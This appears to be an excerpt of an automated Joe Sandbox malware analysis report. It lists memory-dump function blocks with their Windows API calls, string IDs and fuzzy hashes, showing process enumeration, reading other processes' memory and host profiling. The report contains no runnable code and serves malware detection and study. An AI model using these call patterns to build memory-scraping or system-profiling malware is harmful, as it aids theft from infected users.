• Opcode Fuzzy Hash: 3eabf35694fb7367b255f32a536ab17974b5ca8c4e5d7cae6c54b1374e0763a8
• Instruction Fuzzy Hash: 9CF01D75A40308BFD7149BA09C89FEB7B7DEB04755F101159FE09E6291D7B05A448BE0
APIs
• __getptd.LIBCMT ref: 02C99454
  • Part of subcall function 02C98C76: __getptd_noexit.LIBCMT ref: 02C98C79
  • Part of subcall function 02C98C76: __amsg_exit.LIBCMT ref: 02C98C86
• __getptd.LIBCMT ref: 02C9946B
• __amsg_exit.LIBCMT ref: 02C99479
• __lock.LIBCMT ref: 02C99489
• __updatetlocinfoEx_nolock.LIBCMT ref: 02C9949D
Memory Dump Source
• Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
Yara matches
Similarity
• API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
• String ID:
• API String ID: 938513278-0
• Opcode ID: e7b9cb3ff97e9fe8530363059c1b568236a6dbbc01e08edc4d6d2640a621f97e
• Instruction ID: 807883d9c8e490e45ded0b6dd425a28263cd69722ae6e12226d9f9f2b11357fd
• Opcode Fuzzy Hash: e7b9cb3ff97e9fe8530363059c1b568236a6dbbc01e08edc4d6d2640a621f97e
• Instruction Fuzzy Hash: 7DF0E9B3906B009BEF22BBBC980DB5D73A2AF41B20F14424DE449A72D0DF345A00EF59
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 00417DD4
• std::_Xinvalid_argument.LIBCPMT ref: 00417DEF
• memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,00409186,?,?,?,?,00000000,?,00001000,?), ref: 00417E44
  • Part of subcall function 00417E80: std::_Xinvalid_argument.LIBCPMT ref: 00417E98
  • Part of subcall function 00417E80: std::_Xinvalid_argument.LIBCPMT ref: 00417EB6
  • Part of subcall function 00417E80: std::_Xinvalid_argument.LIBCPMT ref: 00417ED1
  • Part of subcall function 00417E80: memcpy.MSVCRT(?,?,?,00000000,?,?,00417DBA,00000000,?,?,00000000,?,00409186,?), ref: 00417F34
Strings
Memory Dump Source
• Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_ED60.jbxd
Yara matches
Similarity
• API ID: Xinvalid_argumentstd::_$memcpy
• String ID: string too long
• API String ID: 2304785028-2556327735
• Opcode ID: f3f350f5ca3a18f032a25dde2a8975ea80f49d6dc0ad9179ffde5be41f9e09aa
• Instruction ID: 8cc79b66cb5b519718e58846ad6fe927743ec070db89bb510543436db22b056f
• Opcode Fuzzy Hash: f3f350f5ca3a18f032a25dde2a8975ea80f49d6dc0ad9179ffde5be41f9e09aa
• Instruction Fuzzy Hash: 7C31D5323086148BD7209A6CE8809ABF7F5EF92764B20466FF55187781C7759C81839D
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 00408883
  • Part of subcall function 0042A383: std::exception::exception.LIBCMT ref: 0042A398
  • Part of subcall function 0042A383: __CxxThrowException@8.LIBCMT ref: 0042A3AD
Strings
Memory Dump Source
• Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_ED60.jbxd
Yara matches
Similarity
• API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
• String ID: vector<T> too long$yxxx$yxxx
• API String ID: 2884196479-1517697755
• Opcode ID: b6d375bd9d7859bbd86cd9656df10d63bac0162cd2838bb1dbda21e5c2292a03
• Instruction ID: f6320a326fa35fb652fe96cf34ebbd2c7a3c7ab078b6e18e070c860f9a0826fc
• Opcode Fuzzy Hash: b6d375bd9d7859bbd86cd9656df10d63bac0162cd2838bb1dbda21e5c2292a03
• Instruction Fuzzy Hash: 333197B5E005159BCB08DF58C9916AEBBB6EB88310F14827EE905EB385DB34AD01CBD5
APIs
• lstrcpy.KERNEL32(00000000,?), ref: 02C8F30A
• StrCmpCA.SHLWAPI(?,ERROR), ref: 02C8F325
• lstrcpy.KERNEL32(00000000,ERROR), ref: 02C8F386
Strings
Memory Dump Source
• Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
Yara matches
Similarity
• API ID: lstrcpy
• String ID: ERROR
• API String ID: 3722407311-2861137601
• Opcode ID: 632f983ec1a59fbeae9d1682bdc08354ae4e6f1e633237f9836f04f0d4d6b41b
• Instruction ID: d78506274a66f7347d86ae153b7fd4ac4a9f38dacfde5103ac07209420c6f737
• Opcode Fuzzy Hash: 632f983ec1a59fbeae9d1682bdc08354ae4e6f1e633237f9836f04f0d4d6b41b
• Instruction Fuzzy Hash: 27216DB46106869BDB10FF3ACC45E9D37A5EF64308F448528EC49DBA40EB38E944EF91
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 02C92F36
• RtlAllocateHeap.NTDLL(00000000), ref: 02C92F3D
• GetComputerNameA.KERNEL32(00000000,00000104), ref: 02C92F51
Strings
Memory Dump Source
• Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateComputerNameProcess
• String ID: @LC
• API String ID: 1664310425-1019364593
• Opcode ID: d84918a8bab9d2b40bac2b81053a19d5874cca919af21581d430d2c9d0c7d92e
• Instruction ID: c1a12ed827c0a093e58e7ae46251cc2627e9aa4f86e53485d8923576d45620e9
• Opcode Fuzzy Hash: d84918a8bab9d2b40bac2b81053a19d5874cca919af21581d430d2c9d0c7d92e
• Instruction Fuzzy Hash: 6B01D672B44614ABC714CF99ED45B9AF7BCF744B21F10026AFD15D3780D7B559008AE1
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 00408737
  • Part of subcall function 0042A383: std::exception::exception.LIBCMT ref: 0042A398
  • Part of subcall function 0042A383: __CxxThrowException@8.LIBCMT ref: 0042A3AD
Strings
Memory Dump Source
• Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_ED60.jbxd
Yara matches
Similarity
• API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
• String ID: vector<T> too long$yxxx$yxxx
• API String ID: 2884196479-1517697755
• Opcode ID: 06048c700276cc93ff33ce3616ad7d162ee1e11297dd13f9dc071f84c650e282
• Instruction ID: b8ef7efc7810e4325e39fc60aebade5df8dffd74ddad37b5b040afbd6501b1a9
• Opcode Fuzzy Hash: 06048c700276cc93ff33ce3616ad7d162ee1e11297dd13f9dc071f84c650e282
• Instruction Fuzzy Hash: 26F06D27B000210BC314A43E9E8449EA94657E539037AD67AE89AFF399DC74EC8285D9
APIs
• ??2@YAPAXI@Z.MSVCRT(?,00408C6B,00000000,?,?,00000000), ref: 00408D62
• std::exception::exception.LIBCMT ref: 00408D7D
• __CxxThrowException@8.LIBCMT ref: 00408D92
Strings
Memory Dump Source
• Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_ED60.jbxd
Yara matches
Similarity
• API ID: ??2@Exception@8Throwstd::exception::exception
• String ID: $KC
• API String ID: 3448701045-1012773322
• Opcode ID: 51656279e56368e7ce8787016bc7534fb037c8a5d6e2363c95d7d4a48b92e3ae
• Instruction ID: b2a08596474d7957a22417a507aa23d885842d8934a0086806a9bcddfe39eae7
• Opcode Fuzzy Hash: 51656279e56368e7ce8787016bc7534fb037c8a5d6e2363c95d7d4a48b92e3ae
• Instruction Fuzzy Hash: 68E02B7050060997CB14FBB49D016BFB3A89F00305F40076EE911A21C1EF78D614C19E
APIs
• lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C8C477
Memory Dump Source
• Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
Yara matches
Similarity
• API ID: lstrcpy
• String ID:
• API String ID: 3722407311-0
• Opcode ID: ad8233c0130a24f88ab602af3c5821d880ebf063a73d3f6edf3306257c85bd54
• Instruction ID: 57accb85e1cd1404f87e4c17c137f68ef274033584a49350c0372a03ef402e1f
• Opcode Fuzzy Hash: ad8233c0130a24f88ab602af3c5821d880ebf063a73d3f6edf3306257c85bd54
• Instruction Fuzzy Hash: 61316070E002469BDB14BFB5DD88A6D7BB6EB85308F148476D811E7290D774CA84EFA1
APIs
• lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C8F126
• lstrlen.KERNEL32(00000000), ref: 02C8F13D
• lstrcpy.KERNEL32(00000000,00000000), ref: 02C8F164
• lstrlen.KERNEL32(00000000), ref: 02C8F16B
• lstrcpy.KERNEL32(00000000,00434F94), ref: 02C8F199
Memory Dump Source
• Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
Yara matches
Similarity
• API ID: lstrcpy$lstrlen
• String ID:
• API String ID: 367037083-0
• Opcode ID: e4b45a5bf4cf7a6b35286c05ec90594b85cd4af978226eb9eeaabd1dfbc3da08
• Instruction ID: 2a75296df9b7d25c18d43dfdd9a09c48e007d691946a63a623a7feba4581c3b2
• Opcode Fuzzy Hash: e4b45a5bf4cf7a6b35286c05ec90594b85cd4af978226eb9eeaabd1dfbc3da08
• Instruction Fuzzy Hash: 4331C175A005825BD710BB78DC49E6E7BA6EF50308F448024EC09DB650EF34DD49AFD2
APIs
  • Part of subcall function 02C97657: lstrcpy.KERNEL32(00000000,ERROR), ref: 02C97675
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C93ECD
• Process32First.KERNEL32(00000000,00000128), ref: 02C93EE0
• Process32Next.KERNEL32(00000000,00000128), ref: 02C93EF6
  • Part of subcall function 02C97787: lstrlen.KERNEL32(------,02C75E52), ref: 02C97792
  • Part of subcall function 02C97787: lstrcpy.KERNEL32(00000000), ref: 02C977B6
  • Part of subcall function 02C97787: lstrcat.KERNEL32(?,------), ref: 02C977C0
  • Part of subcall function 02C976F7: lstrcpy.KERNEL32(00000000), ref: 02C97725
• CloseHandle.KERNEL32(00000000), ref: 02C9402E
Memory Dump Source
• Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
Yara matches
Similarity
• API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
• String ID:
• API String ID: 1066202413-0
• Opcode ID: 86ba30f9204512a426729968a4d2093ab3767b347d89881fb66f24320cb6b34b
• Instruction ID: a18d315c245098fea72a2beda155e33fc17c1ae674daf7492a2a8b4bb6c57211
• Opcode Fuzzy Hash: 86ba30f9204512a426729968a4d2093ab3767b347d89881fb66f24320cb6b34b
• Instruction Fuzzy Hash: 6F810271900254CFCB28CF18C94CB95B7F1FB84329F29D1E9E4099B2A2D7769982CF90
APIs
• ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00064000,00000000), ref: 02C926B9
• ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C92795
• VirtualQueryEx.KERNEL32(00000000,?,?,0000001C), ref: 02C927F7
• ??_V@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C928D6), ref: 02C92809
Memory Dump Source
• Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
Yara matches
Similarity
• API ID: MemoryProcessRead$QueryVirtual
• String ID:
• API String ID: 268806267-0
• Opcode ID: bf9dd57763a3536566a065c2bc79d4865df21d204336eefc4a2e144d3d7958f7
• Instruction ID: ca49b9cdde85b14219855cda6856090092dd3c01bcb8ed36e15d3ec46302ffbb
• Opcode Fuzzy Hash: bf9dd57763a3536566a065c2bc79d4865df21d204336eefc4a2e144d3d7958f7
• Instruction Fuzzy Hash: 4841A271A00219ABDF20CF64D888BAEB7B6FF84724F148129ED55EB240D335EE51CB91
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 02C74D02
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02C74D09
                                                      • strlen.MSVCRT ref: 02C74D96
                                                      • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 02C74E17
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateProcessProtectVirtualstrlen
                                                      • String ID:
                                                      • API String ID: 2355128949-0
                                                      • Opcode ID: f16473a37540a51901c5d734788aa638d0d129d2ef11d876a3004c0bbe0b3cfa
                                                      • Instruction ID: 1f4650b9c6a4bafc6aa752750bf2a0fc005c53403724ad12361b28b31217711a
                                                      • Opcode Fuzzy Hash: f16473a37540a51901c5d734788aa638d0d129d2ef11d876a3004c0bbe0b3cfa
                                                      • Instruction Fuzzy Hash: C931F8A0B8022C7686306BB56C4AFEF7E5CDFCC752F215253F51856181C9B86581CEFA
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 02C880FF
                                                        • Part of subcall function 02C9A637: std::exception::exception.LIBCMT ref: 02C9A64C
                                                        • Part of subcall function 02C9A637: __CxxThrowException@8.LIBCMT ref: 02C9A661
                                                        • Part of subcall function 02C9A637: std::exception::exception.LIBCMT ref: 02C9A672
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 02C8811D
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 02C88138
                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,02C88021,00000000,?,?,00000000,?,02C793ED,?), ref: 02C8819B
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throwmemcpy
                                                      • String ID:
                                                      • API String ID: 285807467-0
                                                      • Opcode ID: b6a1c629716581b52e68e708abdf709907f11cc0c0bd2c94fa2b28493e39cf69
                                                      • Instruction ID: 75aa6ce08c8c9d1bd0e5b62314e98000361c6a8befe6cf3e0cb37751c3ef987a
                                                      • Opcode Fuzzy Hash: b6a1c629716581b52e68e708abdf709907f11cc0c0bd2c94fa2b28493e39cf69
                                                      • Instruction Fuzzy Hash: 0F2173313006045FD724EE6CDC90A3AF7E6BB95718FA48B2EE5928BB40DB71E9408795
                                                      APIs
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C8EFFB
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8F02A
                                                      • lstrcat.KERNEL32(?,00000000), ref: 02C8F038
                                                      • lstrcat.KERNEL32(?,00638930), ref: 02C8F053
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$FolderPathlstrcpy
                                                      • String ID:
                                                      • API String ID: 818526691-0
                                                      • Opcode ID: 9cc5f4f48837b050f6b2b4b6e26b6a0ca4a383e2b77633cfd40bfa615b9ec1a3
                                                      • Instruction ID: 28f10be1a7a9f07580b5336606c7990210a31606e44b009d4f6cba572bf7197d
                                                      • Opcode Fuzzy Hash: 9cc5f4f48837b050f6b2b4b6e26b6a0ca4a383e2b77633cfd40bfa615b9ec1a3
                                                      • Instruction Fuzzy Hash: 173192B5A001599FDB14EB64DC41FED77B6EF58304F1044A8BA0997290DF70AE84DF91
                                                      APIs
                                                      • strtok_s.MSVCRT ref: 02C8CCBC
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C8CCF9
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C8CD28
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$strtok_s
                                                      • String ID:
                                                      • API String ID: 2610293679-0
                                                      • Opcode ID: b40612fd25f670abc5c2525361bc965727c789082fb9b4ae905687b599823f5c
                                                      • Instruction ID: 32d8beee3bf0266b601830bc7ab7828bead289606cc834add419e537298d68d6
                                                      • Opcode Fuzzy Hash: b40612fd25f670abc5c2525361bc965727c789082fb9b4ae905687b599823f5c
                                                      • Instruction Fuzzy Hash: 2621EFB1E00249AFDB24EFB49D84BAE7BB5EB48308F104066D815E7280E7748A458BA1
                                                      APIs
                                                      • strtok_s.MSVCRT ref: 02C8841C
                                                      • lstrlen.KERNEL32(00000000), ref: 02C88462
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C88491
                                                      • StrCmpCA.SHLWAPI(00000000,00434C44), ref: 02C884A9
                                                      • lstrlen.KERNEL32(00000000), ref: 02C884E7
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C88516
                                                      • strtok_s.MSVCRT ref: 02C88526
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpylstrlenstrtok_s
                                                      • String ID:
                                                      • API String ID: 3280532728-0
                                                      • Opcode ID: 15d672ecd9375eec1ed801102a13c61490038a16d483f152d483eea350dc0055
                                                      • Instruction ID: 5aa8bcb38f98b6a57c2070f9309720e1ceb97b06c325eda8352ce70ad672e5e4
                                                      • Opcode Fuzzy Hash: 15d672ecd9375eec1ed801102a13c61490038a16d483f152d483eea350dc0055
                                                      • Instruction Fuzzy Hash: 4E21F7769002099BDB21EFA8DC54B9ABBF4EF80318F54C25DEC49D7640EB34DA46CB90
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcessstrtok_s
                                                      • String ID:
                                                      • API String ID: 3407564107-0
                                                      • Opcode ID: e32d8f13d92b4f8be065ea15d8ae7a751741077e79e59938cdf0aef7d257bcc6
                                                      • Instruction ID: 1b6c45c193bc0cdfa5649c39656c53dfec2c588489c5601a56c9e748cbcf03fc
                                                      • Opcode Fuzzy Hash: e32d8f13d92b4f8be065ea15d8ae7a751741077e79e59938cdf0aef7d257bcc6
                                                      • Instruction Fuzzy Hash: A1015275A00209FBCB10DFA5DC848AE77B9EB88314F008176E90597240E7759A458BA5
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02C93826
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02C9382D
                                                      • GlobalMemoryStatusEx.KERNEL32 ref: 02C93848
                                                      • wsprintfA.USER32 ref: 02C9386E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                                      • String ID:
                                                      • API String ID: 2922868504-0
                                                      • Opcode ID: 6476a7a4e21804b2a4dc54000014bbd5545afbf6c0da17dd2819ec863194e643
                                                      • Instruction ID: e1932597c3e80f5fc9cc825c8133700ba5d8f069220092a904ae9c4b65528ad7
                                                      • Opcode Fuzzy Hash: 6476a7a4e21804b2a4dc54000014bbd5545afbf6c0da17dd2819ec863194e643
                                                      • Instruction Fuzzy Hash: 9401D8B1F04654AFDB18DF98DC49BAEB7B9FF44710F00016AF906E7380D7B499008AA5
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0042A5E0,000000FF), ref: 02C92FC6
                                                      • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02C92FCD
                                                      • GetLocalTime.KERNEL32(?,?,00000000,0042A5E0,000000FF), ref: 02C92FD9
                                                      • wsprintfA.USER32 ref: 02C93005
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                      • String ID:
                                                      • API String ID: 377395780-0
                                                      • Opcode ID: 37c43ae7653e96529821a6031157e9ef27321789b139977156efb11eb726534c
                                                      • Instruction ID: e36ea55864ceb75fd556ce5c52734ed0b2613149fd914bf11c9d359ea8bcafb3
                                                      • Opcode Fuzzy Hash: 37c43ae7653e96529821a6031157e9ef27321789b139977156efb11eb726534c
                                                      • Instruction Fuzzy Hash: FC0192B2904224ABCB149BC9DD45FBFB7BDFB4CB11F00010AFA05A2280E7B84840C7B1
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000410,00000000), ref: 02C94909
                                                      • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02C94924
                                                      • CloseHandle.KERNEL32(00000000), ref: 02C9492B
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C9495E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                                      • String ID:
                                                      • API String ID: 4028989146-0
                                                      • Opcode ID: 029c60a11133292b78579776ac8f662a47e1db9485ded8d9746e7aa4106313b1
                                                      • Instruction ID: 5a78637dc1e0308eef7c1bf94359541f47cbe03336f8b7e1c676c7e464dbeb24
                                                      • Opcode Fuzzy Hash: 029c60a11133292b78579776ac8f662a47e1db9485ded8d9746e7aa4106313b1
                                                      • Instruction Fuzzy Hash: DEF0F6B19016256FEB31ABB49C4DBE9BBADAF45304F0404A4FA85D7180DBF08985CBE4
                                                      APIs
                                                      • lstrlen.KERNEL32(------,02C75E52), ref: 02C97792
                                                      • lstrcpy.KERNEL32(00000000), ref: 02C977B6
                                                      • lstrcat.KERNEL32(?,------), ref: 02C977C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcatlstrcpylstrlen
                                                      • String ID: ------
                                                      • API String ID: 3050337572-882505780
                                                      • Opcode ID: adc57774bd4793d8eea96f035dc7f85e9a30f09413a88c1a063c923ae78d1415
                                                      • Instruction ID: bfaf9c563bcaad9646b44bcc3f7e9b9bec333a9078f7c04a6134b97a5903b0e4
                                                      • Opcode Fuzzy Hash: adc57774bd4793d8eea96f035dc7f85e9a30f09413a88c1a063c923ae78d1415
                                                      • Instruction Fuzzy Hash: 4AF039B4911302CFDB209F35D88C922BBFAEF98B04318882DA88AC7314EB30D440CF60
                                                      APIs
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C717BE
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C717E0
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C71802
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C71866
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C837D9
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C83802
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C83828
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8384E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: 1e9be69b6d1d964f5a35dcc0e79b14959f9aa6a02d672a7784e4edeb24e27305
                                                      • Instruction ID: 41cb037f95b2edbe6cd3e9250b5b3da7747a72b64a1115b63ee4d94495a1cf57
                                                      • Opcode Fuzzy Hash: 1e9be69b6d1d964f5a35dcc0e79b14959f9aa6a02d672a7784e4edeb24e27305
                                                      • Instruction Fuzzy Hash: 3512EB70A012418FDB18DF19C558B25B7E5AF84B2CB19D1EED809DB3A1D772D982CF90
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 004087DC
                                                      • memcpy.MSVCRT(?,?,00000000,00000000,00407897), ref: 00408822
                                                        • Part of subcall function 00408980: std::_Xinvalid_argument.LIBCPMT ref: 00408996
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmp
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Xinvalid_argumentstd::_$memcpy
